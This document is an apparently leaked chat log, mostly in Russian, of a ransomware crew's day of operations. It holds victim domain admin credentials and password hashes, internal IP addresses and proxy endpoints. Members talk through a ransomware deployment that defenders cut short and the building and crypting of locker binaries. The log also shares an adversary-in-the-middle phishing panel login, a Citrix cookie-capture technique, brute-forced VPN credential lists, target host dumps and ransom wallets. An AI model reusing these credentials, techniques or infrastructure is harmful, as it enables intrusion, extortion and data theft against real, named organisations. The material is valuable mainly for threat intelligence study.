[2024-05-24 00:00:04] @burito:matrix.bestflowers247.online: отойду
--------------------
[2024-05-24 00:11:12] @nickolas:talks.icu: так ничего и не ответил )
--------------------
[2024-05-24 00:17:47] @usernamess:matrix.bestflowers247.online: 68cdd17ecaa29e83ca478089e4aec8f2
de0fcc68765b8b4d5eae74239ee29b99
541901212b15a72d989efb107047eb2a
--------------------
[2024-05-24 00:47:56] @usernamegg:matrix.bestflowers247.online: ++++
--------------------
[2024-05-24 01:45:37] @usernamess:matrix.bestflowers247.online: 172.17.1.66
172.26.151.8
172.26.151.12

172.26.144.157
172.26.144.156
172.26.151.10
172.19.15.51

--------------------
[2024-05-24 01:47:10] @usernamess:matrix.bestflowers247.online: ```
VSC.COM\games.adm m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
VSC.COM\jhaynes.vadm m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
```
--------------------
[2024-05-24 01:47:43] @usernamess:matrix.bestflowers247.online: sportsupplygroup.com
--------------------
[2024-05-24 02:17:40] @usernamess:matrix.bestflowers247.online: VSC_39srv_outfile.xls
--------------------
[2024-05-24 02:18:06] @usernamess:matrix.bestflowers247.online: vsc.com_sorted.txt
--------------------
[2024-05-24 02:19:01] @usernamess:matrix.bestflowers247.online: 172.17.1.118










172.17.1.14

--------------------
[2024-05-24 02:19:08] @usernamess:matrix.bestflowers247.online: * 172.17.1.118
172.17.1.14

--------------------
[2024-05-24 02:22:00] @usernamess:matrix.bestflowers247.online: 5.61.61.64:41183
--------------------
[2024-05-24 02:35:22] @usernamess:matrix.bestflowers247.online: SSG_outfile.xls
--------------------
[2024-05-24 02:35:31] @usernamess:matrix.bestflowers247.online: sportsupplygroup.com_sorted.txt
--------------------
[2024-05-24 02:35:39] @usernamess:matrix.bestflowers247.online: ```
sportsupplygroup.com\JoeBlow m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
sportsupplygroup.com\kmeador.adm m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
```
--------------------
[2024-05-24 02:50:09] @usernameww:matrix.bestflowers247.online: 10.1.52.74
--------------------
[2024-05-24 02:52:58] @usernamess:matrix.bestflowers247.online: 10.1.50.149
--------------------
[2024-05-24 02:53:37] @usernamess:matrix.bestflowers247.online: ```
10.1.50.74



10.1.50.137

10.1.50.109



10.1.50.145

10.1.50.181
```

--------------------
[2024-05-24 03:15:14] @usernamett:matrix.bestflowers247.online: `5.61.61.64:35043   VSC`
--------------------
[2024-05-24 03:29:53] @usernamett:matrix.bestflowers247.online: 5.61.61.64:39593
--------------------
[2024-05-24 04:27:35] @usernamehunter:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent a file.

$krb5tgs$23$*otxsrv$SPORTSUPPLYGROUP.COM$sportsupplygroup.com/otxsrv*$c0dc33baf0badf92......0f184cb103:BSNSports1

--------------------
[2024-05-24 05:40:55] @usernameugway:matrix.bestflowers247.online: бро привет
--------------------
[2024-05-24 05:40:58] @usernameugway:matrix.bestflowers247.online: я не пропадал
--------------------
[2024-05-24 05:41:35] @usernameugway:matrix.bestflowers247.online: доделываю кое что , потом встретимся
--------------------
[2024-05-24 05:41:38] @usernameugway:matrix.bestflowers247.online: я тут каждый день )
--------------------
[2024-05-24 05:41:43] @usernameugway:matrix.bestflowers247.online: никуда не пропадаю
--------------------
[2024-05-24 05:56:27] @usernamegg:matrix.bestflowers247.online: ++++
--------------------
[2024-05-24 05:56:40] @usernamegg:matrix.bestflowers247.online: оо
--------------------
[2024-05-24 05:56:53] @usernamegg:matrix.bestflowers247.online: в 6:30 начали ставить ?
--------------------
[2024-05-24 05:58:17] @usernamegg:matrix.bestflowers247.online: есть кто живой ?
--------------------
[2024-05-24 06:02:15] @chuck:talks.icu: а смысл в ленде тут?
--------------------
[2024-05-24 06:02:46] @chuck:talks.icu: аа типо чтобы видели
--------------------
[2024-05-24 06:02:47] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-24 06:02:53] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-05-24 06:02:54] @chuck:talks.icu: привет
--------------------
[2024-05-24 06:04:57] @chuck:talks.icu: ну да норм наверное
--------------------
[2024-05-24 06:11:11] @usernameyy:matrix.bestflowers247.online: да
--------------------
[2024-05-24 06:11:36] @usernameyy:matrix.bestflowers247.online: надо было в тг написать, я бы зашел
--------------------
[2024-05-24 08:03:04] @usernameyy:matrix.bestflowers247.online: 35154_NL_tcp.ovpn
--------------------
[2024-05-24 08:03:13] @usernameyy:matrix.bestflowers247.online: этот сингл плохо работает, низкая скорость и высокий пинг
--------------------
[2024-05-24 08:03:28] @usernameyy:matrix.bestflowers247.online: * чего в тг не написал?, я бы зашел
--------------------
[2024-05-24 08:03:32] @usernameyy:matrix.bestflowers247.online: * чего в тг не написал? я бы зашел
--------------------
[2024-05-24 08:16:20] @usernameyy:matrix.bestflowers247.online: * чего в тг не написал?)) я бы зашел
--------------------
[2024-05-24 08:16:39] @usernameyy:matrix.bestflowers247.online: * этот сингл плохо работает, низкая скорость и высокий пинг (началось только сегодня)
--------------------
[2024-05-24 08:25:25] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 08:28:09] @lapa:matrix.bestflowers247.online: Привет! Я тут вчера подумал. Смотрите. Вот пользователь атворизовался в сонике через 2аф в веб весии приложения. Вы получили куки и тд. Но, ведь вам вообще нужно же попать в десткопную версию впнки)
--------------------
[2024-05-24 08:28:47] @lapa:matrix.bestflowers247.online: * Привет! Я тут вчера подумал. Смотрите. Вот пользователь атворизовался в сонике через 2аф в веб версии. Вы получили куки и тд. Но, ведь вам вообще нужно же попать в десткопную версию впнки)
--------------------
[2024-05-24 08:29:24] @lapa:matrix.bestflowers247.online: т.е. он авторисуется по сути на сайте через 2аф, а как вы попадете в сеть?
--------------------
[2024-05-24 08:29:32] @lapa:matrix.bestflowers247.online: * т.е. он авторизуется по сути на сайте через 2аф, а как вы попадете в сеть?
--------------------
[2024-05-24 08:30:08] @lapa:matrix.bestflowers247.online: * Привет! Я тут вчера подумал. Смотрите. Вот пользователь атворизовался в сонике через 2аф в веб версии. Вы получили креды, куки и тд. Но, ведь вам вообще нужно же попать в десткопную версию впнки)
--------------------
[2024-05-24 08:32:15] @lapa:matrix.bestflowers247.online: просто насколько понимаю, вам же не нужен в целом доступ в веб версию(там ничего такого нет), вам нужен доступ в приложение декстопное впнки
--------------------
[2024-05-24 08:36:26] @lapa:matrix.bestflowers247.online: VALID_BRUT_SONIC.txt
--------------------
[2024-05-24 08:36:27] @lapa:matrix.bestflowers247.online: VALID_BRUT_RDWEB.txt
--------------------
[2024-05-24 08:36:27] @lapa:matrix.bestflowers247.online: VALID_BRUT_CISCO.txt
--------------------
[2024-05-24 08:39:43] @nickolas:talks.icu: привет
--------------------
[2024-05-24 08:40:05] @nickolas:talks.icu: ну чего ты про bsnsports.com молчишь ?)
--------------------
[2024-05-24 08:40:25] @usernamess:matrix.bestflowers247.online: stop my all
--------------------
[2024-05-24 08:41:19] @usernamess:matrix.bestflowers247.online: нет мы начали другую ставить
--------------------
[2024-05-24 08:42:01] @usernamegg:matrix.bestflowers247.online: ща поем
--------------------
[2024-05-24 08:42:04] @usernamegg:matrix.bestflowers247.online: и обсудим
--------------------
[2024-05-24 08:42:09] @usernamegg:matrix.bestflowers247.online: я до утра сидел
--------------------
[2024-05-24 08:54:13] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> sent a file.

Привет. Сделать?
--------------------
[2024-05-24 08:54:39] @usernamegg:matrix.bestflowers247.online: с ней до 6:30 сидели я поспал два часа пошел в зал
--------------------
[2024-05-24 08:54:46] @usernamegg:matrix.bestflowers247.online: сейчас кушаю
--------------------
[2024-05-24 08:54:53] @usernamegg:matrix.bestflowers247.online: непонимаю кто я и где я
--------------------
[2024-05-24 08:55:05] @nickolas:talks.icu: красавцы
--------------------
[2024-05-24 08:55:09] @nickolas:talks.icu: а какой результат пока что ?
--------------------
[2024-05-24 08:55:46] @nickolas:talks.icu: в плане выносливости и отдачи на работе, ты конечно просто огромной МОЛОДЕЦ! :-)
--------------------
[2024-05-24 09:00:19] @usernamegg:matrix.bestflowers247.online: поставили
--------------------
[2024-05-24 09:00:21] @usernamegg:matrix.bestflowers247.online: качнули ее
--------------------
[2024-05-24 09:00:27] @usernamegg:matrix.bestflowers247.online: но в конце админы
--------------------
[2024-05-24 09:00:36] @usernamegg:matrix.bestflowers247.online: как котят вышвырнули нас
--------------------
[2024-05-24 09:00:43] @usernamegg:matrix.bestflowers247.online: которые нагадили мимо лотка
--------------------
[2024-05-24 09:00:48] @usernamegg:matrix.bestflowers247.online: как еще описать ?
--------------------
[2024-05-24 09:00:53] @usernamegg:matrix.bestflowers247.online: всю ночь перво все получалось
--------------------
[2024-05-24 09:00:58] @usernamegg:matrix.bestflowers247.online: в 6 утра все изменилось
--------------------
[2024-05-24 09:01:01] @usernamegg:matrix.bestflowers247.online: они пришли
--------------------
[2024-05-24 09:01:05] @usernamegg:matrix.bestflowers247.online: рубанули траст
--------------------
[2024-05-24 09:01:13] @usernamegg:matrix.bestflowers247.online: второй траст был по нитке затянут
--------------------
[2024-05-24 09:01:18] @usernamegg:matrix.bestflowers247.online: всю сеть вырубили они
--------------------
[2024-05-24 09:01:25] @usernamegg:matrix.bestflowers247.online: 2 тачки есть но они сейчас не в домене
--------------------
[2024-05-24 09:01:27] @usernamegg:matrix.bestflowers247.online: 400гб
--------------------
[2024-05-24 09:01:30] @usernamegg:matrix.bestflowers247.online: данных есть
--------------------
[2024-05-24 09:01:46] @nickolas:talks.icu: ну главное проставить успели, шухера чуть навели, данные есть, но конечно не много.
--------------------
[2024-05-24 09:01:59] @nickolas:talks.icu: то что может не все накрыли, ну это не так важно.
--------------------
[2024-05-24 09:02:06] @nickolas:talks.icu: большие молодцы!
--------------------
[2024-05-24 09:02:45] @usernamegg:matrix.bestflowers247.online: да я бы еще туда зашел
--------------------
[2024-05-24 09:02:54] @usernamegg:matrix.bestflowers247.online: они рубанули сеть
--------------------
[2024-05-24 09:02:56] @usernamegg:matrix.bestflowers247.online: выключили
--------------------
[2024-05-24 09:03:01] @usernamegg:matrix.bestflowers247.online: трасты друг друга не видят
--------------------
[2024-05-24 09:03:09] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-05-24 09:03:12] @usernamegg:matrix.bestflowers247.online: все не актуально уже
--------------------
[2024-05-24 09:03:17] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 09:03:19] @nickolas:talks.icu: ну на простановке уже никуда не дется от палева
--------------------
[2024-05-24 09:03:30] @muaddib6:matrix.org: ЗАНИМАЮСЬ
--------------------
[2024-05-24 09:03:39] @nickolas:talks.icu: тихо развернуть софт, вряд ли выйдет
--------------------
[2024-05-24 09:03:42] @muaddib6:matrix.org: * Занимаюсь
--------------------
[2024-05-24 09:04:03] @nickolas:talks.icu: плюс сканы которые приходится проводить, что бы найти все оборудование, тоже как бы та еще шумная штука.
--------------------
[2024-05-24 09:04:28] @nickolas:talks.icu: но в любом случае, сетку с рапидой раскрутили, и пиздов им дали )
--------------------
[2024-05-24 09:04:43] @nickolas:talks.icu: красавцы!
--------------------
[2024-05-24 09:05:24] @nickolas:talks.icu: Я думаю завтра утром или сегодня ночью смогу восстановить доступ к впнке

Cielo
www.cielotalent.com
(877) 797-3379
200 S Executive Dr Ste 400 Brookfield, Wisconsin 53005, United States
HR & Staffing, Business Services
Employees:1,001 - 5,000
$1.5B
--------------------
[2024-05-24 09:05:46] @nickolas:talks.icu: у нас там в мс свой номер для восстановления паса, а через мс можно провалится в впнку :-)
--------------------
[2024-05-24 09:22:49] @usernameww:matrix.bestflowers247.online: a8b2287b-eee3-4b28-91f1-082e22eef989
df45ee4c-1060-483e-9214-884f23526c6c
сбилди пожалуйста без сейф мода
--------------------
[2024-05-24 09:27:38] @usernamegg:matrix.bestflowers247.online: у нас бага
--------------------
[2024-05-24 09:27:56] @usernamegg:matrix.bestflowers247.online: в биледере файлов
--------------------
[2024-05-24 09:28:11] @usernamegg:matrix.bestflowers247.online: когда мы ставим галку сейфмод все файлы он делает с ним
--------------------
[2024-05-24 09:28:18] @usernamegg:matrix.bestflowers247.online: ну я про ехе
--------------------
[2024-05-24 09:28:29] @usernamegg:matrix.bestflowers247.online: а если галку не ставишь он не делает
--------------------
[2024-05-24 09:28:33] @usernamegg:matrix.bestflowers247.online: как так ?
--------------------
[2024-05-24 09:28:40] @usernamegg:matrix.bestflowers247.online: мы вчера это не сетке чухнули
--------------------
[2024-05-24 09:29:17] @usernameyy:matrix.bestflowers247.online: вроде всё верно) сейф надо отдельно билдить
--------------------
[2024-05-24 09:30:02] @usernamegg:matrix.bestflowers247.online: нельзя билдит вместе все файлы ?
--------------------
[2024-05-24 09:30:13] @usernamegg:matrix.bestflowers247.online: я билжу сейчас комплект без сейф мода
--------------------
[2024-05-24 09:30:16] @usernameyy:matrix.bestflowers247.online: надо сделать чтобы dll была без сейфа?
--------------------
[2024-05-24 09:30:23] @usernameyy:matrix.bestflowers247.online: или как
--------------------
[2024-05-24 09:30:35] @usernamegg:matrix.bestflowers247.online: a8b2287b-eee3-4b28-91f1-082e22eef989_encrypt_release_allsystem_x64.zip
--------------------
[2024-05-24 09:30:40] @usernameyy:matrix.bestflowers247.online: или добавить еще сверху +safe
--------------------
[2024-05-24 09:30:43] @usernameyy:matrix.bestflowers247.online: один exe
--------------------
[2024-05-24 09:30:44] @usernameyy:matrix.bestflowers247.online: в комплект
--------------------
[2024-05-24 09:31:00] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-05-24 09:31:12] @usernameyy:matrix.bestflowers247.online: аа, сейчас сделаю
--------------------
[2024-05-24 09:31:21] @usernamegg:matrix.bestflowers247.online: я сейчас билжу с галкой сейф у меня все ехе только сейф х86 х64
--------------------
[2024-05-24 09:31:26] @usernameyy:matrix.bestflowers247.online: ага
--------------------
[2024-05-24 09:31:34] @usernameyy:matrix.bestflowers247.online: так и задумано было
--------------------
[2024-05-24 09:31:52] @usernamegg:matrix.bestflowers247.online: df45ee4c-1060-483e-9214-884f23526c6c_encrypt_release_allsystem_x64.zip
--------------------
[2024-05-24 09:32:09] @usernameww:matrix.bestflowers247.online: `85af65f2-a2e2-4f97-bda1-dfdec01a9505`
--------------------
[2024-05-24 09:34:24] @usernamegg:matrix.bestflowers247.online: 85af65f2-a2e2-4f97-bda1-dfdec01a9505_encrypt_release_allsystem_x64.zip
--------------------
[2024-05-24 09:34:28] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 09:36:20] @usernameww:matrix.bestflowers247.online: 2file.lockers.zip
--------------------
[2024-05-24 09:36:34] @muaddib6:matrix.org: ++С
--------------------
[2024-05-24 09:36:45] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_SONIC.txt
--------------------
[2024-05-24 09:36:50] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_RDWEB.txt
--------------------
[2024-05-24 09:36:55] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_CISCO.txt
--------------------
[2024-05-24 09:37:10] @usernamegg:matrix.bestflowers247.online: Я думаю завтра утром или сегодня ночью смогу восстановить доступ к впнке

Cielo
www.cielotalent.com
(877) 797-3379
200 S Executive Dr Ste 400 Brookfield, Wisconsin 53005, United States
HR & Staffing, Business Services
Employees:1,001 - 5,000
$1.5B
--------------------
[2024-05-24 09:37:17] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> Я думаю завтра утром или сегодня ночью смогу восстановить доступ к впнке
>
> Cielo
> www.cielotalent.com
> (877) 797-3379
> 200 S Executive Dr Ste 400 Brookfield, Wisconsin 53005, United States
> HR & Staffing, Business Services
> Employees:1,001 - 5,000
> $1.5B

+++
--------------------
[2024-05-24 09:39:41] @usernamegg:matrix.bestflowers247.online: Han: в течение часа успеешь ?
--------------------
[2024-05-24 09:40:56] @muaddib6:matrix.org: Нет. У меня чистка. Все грязно. 2-3 часа
--------------------
[2024-05-24 09:45:52] @usernamegg:matrix.bestflowers247.online: > <@lapa:matrix.bestflowers247.online> т.е. он авторизуется по сути на сайте через 2аф, а как вы попадете в сеть?

молодец а я об этом не подумал
--------------------
[2024-05-24 09:45:55] @usernamegg:matrix.bestflowers247.online: все верно
--------------------
[2024-05-24 09:48:35] @lapa:matrix.bestflowers247.online: ну да, вы же к впнке не поключетесь, даже имея креды и куки... Вы просто с кредами и куками войдете в веб версию и все.
--------------------
[2024-05-24 09:48:51] @lapa:matrix.bestflowers247.online: * ну да, вы же к впнке не поключетесь, даже имея креды и куки... Вы просто с куками войдете в веб версию и все.
--------------------
[2024-05-24 09:49:41] @usernamegg:matrix.bestflowers247.online: так что нам только подходит цитрикс
--------------------
[2024-05-24 09:52:33] @usernameyy:matrix.bestflowers247.online: вы опять сейфом кого то ставите да?
--------------------
[2024-05-24 09:52:57] @lapa:matrix.bestflowers247.online: т.е. вам не нужно авторизовываться в десктопной версии ситрикса?
--------------------
[2024-05-24 09:53:22] @lapa:matrix.bestflowers247.online: просто вы говорили вроде, что качали программу ситрикса для авторизации
--------------------
[2024-05-24 09:54:31] @usernamegg:matrix.bestflowers247.online: citrix это почти всегда рдп вход
--------------------
[2024-05-24 09:54:40] @usernamegg:matrix.bestflowers247.online: как веб рдп
--------------------
[2024-05-24 09:55:04] @usernamegg:matrix.bestflowers247.online: у нас есть парень который приносит там сетки с citrix
--------------------
[2024-05-24 09:55:48] @usernamegg:matrix.bestflowers247.online: он сразу у себя на рдп открывает доступ к тачке и дает мне креды от впск свой. я захожу а там уже открыто все. понять не могу как он это делает
--------------------
[2024-05-24 09:55:56] @usernamegg:matrix.bestflowers247.online: потом понял что куку ловит
--------------------
[2024-05-24 09:58:40] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 10:03:44] @usernameyy:matrix.bestflowers247.online: готово
--------------------
[2024-05-24 10:03:46] @usernameyy:matrix.bestflowers247.online: проверь
--------------------
[2024-05-24 10:06:46] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 10:06:47] @usernamegg:matrix.bestflowers247.online: ща
--------------------
[2024-05-24 10:07:13] @usernamecc:matrix.bestflowers247.online: lambertz.de \\ id:9d93d877-bc86-4e22-88ad-377c2a85282a
--------------------
[2024-05-24 10:07:21] @usernamecc:matrix.bestflowers247.online: сделай плз страницу для блога
--------------------
[2024-05-24 10:11:49] @lapa:matrix.bestflowers247.online: что-то чувак с adfs тянет? у него просто много заказов?
--------------------
[2024-05-24 10:13:39] @usernamegg:matrix.bestflowers247.online: амер ?
--------------------
[2024-05-24 10:13:49] @usernamegg:matrix.bestflowers247.online: https://cpanel.eo4lbrnkfkrwnjukzolbwg4c5olrm263zo6i4eeiepciza7f3ctijpad.onion/login
username: w2124
passsword:  UtJ04Y7JRluuFxKqQn11lW
✅ Where i can get VPS/Domain with crypto?
✅ How can i add VPS?
✅ How can i link domain?

--------------------
[2024-05-24 10:13:55] @usernamegg:matrix.bestflowers247.online: FOR UPDATES,NEWS PLEASE SUBSCRIBE TO OUR CHANNEL:
https://t.me/evil_proxy
--------------------
[2024-05-24 10:14:10] @usernamegg:matrix.bestflowers247.online: u should start from Guides section. Guides u can find in left menu - last line. use onion browser.
--------------------
[2024-05-24 10:16:32] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> амер ?

не, первый который
--------------------
[2024-05-24 10:16:40] @lapa:matrix.bestflowers247.online: мы его еще слали
--------------------
[2024-05-24 10:17:17] @usernamegg:matrix.bestflowers247.online: ```
verb0, [22 мая 2024 г., 20:52:30]:
Ну я сделал. Валид определяем. Куки снифаются, креды ловятся, насколько это всё работает в случае реального акка - хз т.к. валид саморега вроде как нет, а за вторую страницу логина я зайти не смог т.к. те же креды что и к первой туда не подходят - пишет invalid domain (так и должно быть?).
Обнови панель и увидишь вкладку цитрикса.
Заход на линк с путём /?RD--MTM4LjE5OS4xMTguMTg0
а MTM4LjE5OS4xMTguMTg0 это base64 наш ип
с таким путём ип клеится на этот домен для того IP юзера с которого был заход, т.е. если у юзера сменится ип на пол пути после начала входа - это проблема.

https://earningportals.com/?RD--MTM4LjE5OS4xMTguMTg0

к примеру вот так надо заходить если хочешь попасть на "138.199.118.184"

такс продолжаю значит ебаться с алертом
```
--------------------
[2024-05-24 10:17:25] @usernamegg:matrix.bestflowers247.online: ```
verb0, [23 мая 2024 г., 03:01:42]:
соник могу начать часов через 12

по майкрософту, завтра надо будет тестить трафом, я допилю чтобы нормально работали домены + посмотрю решился ли алерт теми методами что я пилил всё это время, отпишу по результатам днём

хотелось бы быть онлайн при проливе цитрикса чтобы если что-то вскроется быстро зафиксить
хотя я так-то тестил, но хз
```
--------------------
[2024-05-24 10:17:35] @usernamegg:matrix.bestflowers247.online: ```
verb0, [23 мая 2024 г., 22:05:15]:
тут

цитрикс готов был, сейчас он не будет работать поскольку я делаю майкрософт

т.е. этот линк который я скинул это реальный линк был
```
--------------------
[2024-05-24 10:20:00] @lapa:matrix.bestflowers247.online: ну соник пусть не делает
--------------------
[2024-05-24 10:21:17] @lapa:matrix.bestflowers247.online: `https://earningportals.com/?RD--MTM4LjE5OS4xMTguMTg0` у меня не открывается
--------------------
[2024-05-24 10:23:50] @lapa:matrix.bestflowers247.online: но я бы adfs допиливал, потому что у них больше всего вводили креды
--------------------
[2024-05-24 10:23:51] @usernamegg:matrix.bestflowers247.online: он написал что пока не рабоатет
--------------------
[2024-05-24 10:24:04] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> он написал что пока не рабоатет

+
--------------------
[2024-05-24 10:24:10] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> он написал что пока не рабоатет

* понял
--------------------
[2024-05-24 10:27:08] @usernamegg:matrix.bestflowers247.online: я про линк
--------------------
[2024-05-24 10:28:19] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 10:42:42] @lapa:matrix.bestflowers247.online: можете сбросить айпишники rdweb ?
--------------------
[2024-05-24 10:43:07] @lapa:matrix.bestflowers247.online: я пока запущу без соксов, посмотрим насколько абузоустойченый сервер
--------------------
[2024-05-24 10:52:08] @usernamess:matrix.bestflowers247.online: 5.61.61.64:36199
--------------------
[2024-05-24 10:55:54] @usernameyy:matrix.bestflowers247.online: ```
BTC Wallet - bc1qyvaa2uwwgf34m3qggzmptcrm45tppfppyhhhde
XMR Wallet - 88M7PZfDZSs3DWB6BY99uKVcnSFAsHr6eEhPmBD2psSyU6hv4EHYB6cGjpysZwEbQKTHCz3JfsiWMZLiDMoZZMSKQddFS66
TRC-20 (Tron): (fee + 2,5 %)
TNgjeQgr8dPSwK2UkhFtNpGK795cJ3yKjL

--------------------
[2024-05-24 10:56:02] @usernameyy:matrix.bestflowers247.online: 900$ abhaz 2
--------------------
[2024-05-24 10:57:00] @usernamess:matrix.bestflowers247.online: VSC.COM\games.adm m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
--------------------
[2024-05-24 10:57:09] @usernamess:matrix.bestflowers247.online: ```
sportsupplygroup.com\JoeBlow m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
sportsupplygroup.com\mjames.adm m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
sportsupplygroup.com\kmeador.adm m8R_Z6TGZ5_m8R_Z6TGZ5_m8R_Z6TGZ5
```
--------------------
[2024-05-24 11:00:21] @burito:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> 2file.lockers.zip

делать?
--------------------
[2024-05-24 11:00:28] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 11:00:31] @usernameww:matrix.bestflowers247.online: DA
--------------------
[2024-05-24 11:00:32] @burito:matrix.bestflowers247.online: ок
--------------------
[2024-05-24 11:03:42] @usernamett:matrix.bestflowers247.online: `45.32.88.233:39909  VSC`
--------------------
[2024-05-24 11:06:39] @usernamegg:matrix.bestflowers247.online: когда будет крипт готов ?
--------------------
[2024-05-24 11:06:40] @usernamegg:matrix.bestflowers247.online: локера
--------------------
[2024-05-24 11:06:42] @usernamegg:matrix.bestflowers247.online: срочно бы
--------------------
[2024-05-24 11:06:52] @burito:matrix.bestflowers247.online: мин30
--------------------
[2024-05-24 11:07:57] @usernamegg:matrix.bestflowers247.online: ого
--------------------
[2024-05-24 11:08:01] @usernamegg:matrix.bestflowers247.online: ну не позже ?
--------------------
[2024-05-24 11:08:22] @burito:matrix.bestflowers247.online: даже может раньше
--------------------
[2024-05-24 11:09:12] @usernamess:matrix.bestflowers247.online: vsc.com_sorted.txt
--------------------
[2024-05-24 11:09:20] @usernamegg:matrix.bestflowers247.online: da5fcd63f4c03153dba01daf303b7cd4349e7662cf4ed3fced45b3570608efff
--------------------
[2024-05-24 11:09:23] @usernamegg:matrix.bestflowers247.online: биток
--------------------
[2024-05-24 11:17:21] @usernamess:matrix.bestflowers247.online: socks5 5.61.61.64 45915
--------------------
[2024-05-24 11:20:21] @usernamess:matrix.bestflowers247.online: 5.61.61.64:40273
--------------------
[2024-05-24 11:21:45] @burito:matrix.bestflowers247.online: > <@usernameww:matrix.bestflowers247.online> 2file.lockers.zip

lockers
--------------------
[2024-05-24 11:21:46] @burito:matrix.bestflowers247.online: lckrs.zip
--------------------
[2024-05-24 11:22:11] @usernameww:matrix.bestflowers247.online: ++
--------------------
[2024-05-24 11:23:26] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> Han: в течение часа успеешь ?

И у меня готово
--------------------
[2024-05-24 11:23:26] @usernamecc:matrix.bestflowers247.online: ```
LEVIAN_DELTE_LOG
http://temp.sh/mePNF/B4khjURCpPKSaDYfvyxL2GQZm3b5eNWqXcAn9z8T.zip
B4khjURCpPKSaDYfvyxL2GQZm3b5eNWqXcAn9z8T.zip
extract pass : x4gScb2FsPRBAmtk5EeJ9fuDzTC6Ww8adXyjhUvV
```
--------------------
[2024-05-24 11:23:47] @muaddib6:matrix.org: > <@usernamegg:matrix.bestflowers247.online> sent a file.

1 -ое
--------------------
[2024-05-24 11:24:03] @muaddib6:matrix.org: 1.7z
--------------------
[2024-05-24 11:28:06] @usernamess:matrix.bestflowers247.online: `https://www.zoominfo.com/c/varsity-spirit-llc/39977438`
--------------------
[2024-05-24 11:28:11] @usernamess:matrix.bestflowers247.online: ```
varsity.com\cbray:10206:aad3b435b51404eeaad3b435b51404ee:3c9b122715f1695e3a3a6171ce2dbe62::: (status=Enabled)
varsity.com\cpasinat:10210:aad3b435b51404eeaad3b435b51404ee:3c9b122715f1695e3a3a6171ce2dbe62::: (status=Enabled)
varsity.com\jradon:10211:aad3b435b51404eeaad3b435b51404ee:3c9b122715f1695e3a3a6171ce2dbe62::: (status=Enabled)
```

--------------------
[2024-05-24 11:29:05] @usernamegg:matrix.bestflowers247.online: ну он еще не залил
--------------------
[2024-05-24 11:29:20] @usernamegg:matrix.bestflowers247.online: ща посмотрю
--------------------
[2024-05-24 11:29:55] @lapa:matrix.bestflowers247.online: ну можно пока и старое
--------------------
[2024-05-24 11:30:16] @lapa:matrix.bestflowers247.online: в нашей переписке я не нахожу
--------------------
[2024-05-24 11:30:40] @usernamegg:matrix.bestflowers247.online: [01:50:58] vns10k -выгружает хосты шодан,: rdweb с фофы щас кину
[01:51:05] vns10k -выгружает хосты шодан,: с шодана нужно?
[02:02:09] AA: да
[02:20:34] vns10k -выгружает хосты шодан,: c fofa https://transfer.sh/rybilvhnvn/rdweb_fofa.tar.gz
[02:21:57] AA: ++
[02:44:03] vns10k -выгружает хосты шодан,: с шодан https://transfer.sh/nFbjftMN3y/rdweb_shodan.tar.gz
[17:26:23] vns10k -выгружает хосты шодан,: привет
[17:32:16] vns10k -выгружает хосты шодан,: форти с фофы и шодана https://transfer.sh/IKpNKwVqhC/forti_fofa&shodan.tar.gz
[17:39:38] vns10k -выгружает хосты шодан,: и я тебе rdweb c zoomeye тоже гружу
--------------------
[2024-05-24 11:30:43] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-24 11:30:44] @usernamegg:matrix.bestflowers247.online: это было давно
--------------------
[2024-05-24 11:30:51] @usernamegg:matrix.bestflowers247.online: работают линки проверь
--------------------
[2024-05-24 11:31:03] @usernamegg:matrix.bestflowers247.online: [00:25:31] vns10k -выгружает хосты шодан,: rdweb us zoomeye https://transfer.sh/dWlMwjUCj7/rdweb_us_zoomeye.tar.gz
[00:59:28] vns10k -выгружает хосты шодан,: rdweb us zoomeye https://transfer.sh/dWlMwjUCj7/rdweb_us_zoomeye.tar.gz
[01:02:55] vns10k -выгружает хосты шодан,: rdweb us zoomeye https://transfer.sh/dWlMwjUCj7/rdweb_us_zoomeye.tar.gz
[01:11:44] vns10k -выгружает хосты шодан,: rdweb us zoomeye https://transfer.sh/dWlMwjUCj7/rdweb_us_zoomeye.tar.gz
[02:54:43] vns10k -выгружает хосты шодан,: остальное с zoomeye https://transfer.sh/sIMbM0TwB2/rdweb_zoomeye.tar.gz
--------------------
[2024-05-24 11:31:14] @usernamegg:matrix.bestflowers247.online: [15:41:33] vns10k -выгружает хосты шодан,: форти юс и канада https://transfer.sh/N2pYkiIHGO/forti_us&ca_zoomeye.tar.gz
--------------------
[2024-05-24 11:31:22] @usernamegg:matrix.bestflowers247.online: [00:17:31] vns10k -выгружает хосты шодан,: форти gb и de https://transfer.sh/NP9siFEzLP/forti_de&gb_zoomeye.tar.gz
[02:51:32] vns10k -выгружает хосты шодан,: форти au, ch и nz https://transfer.sh/BkK1aK6K8Q/forti_au&ch&nz_zoomeye.tar.gz
--------------------
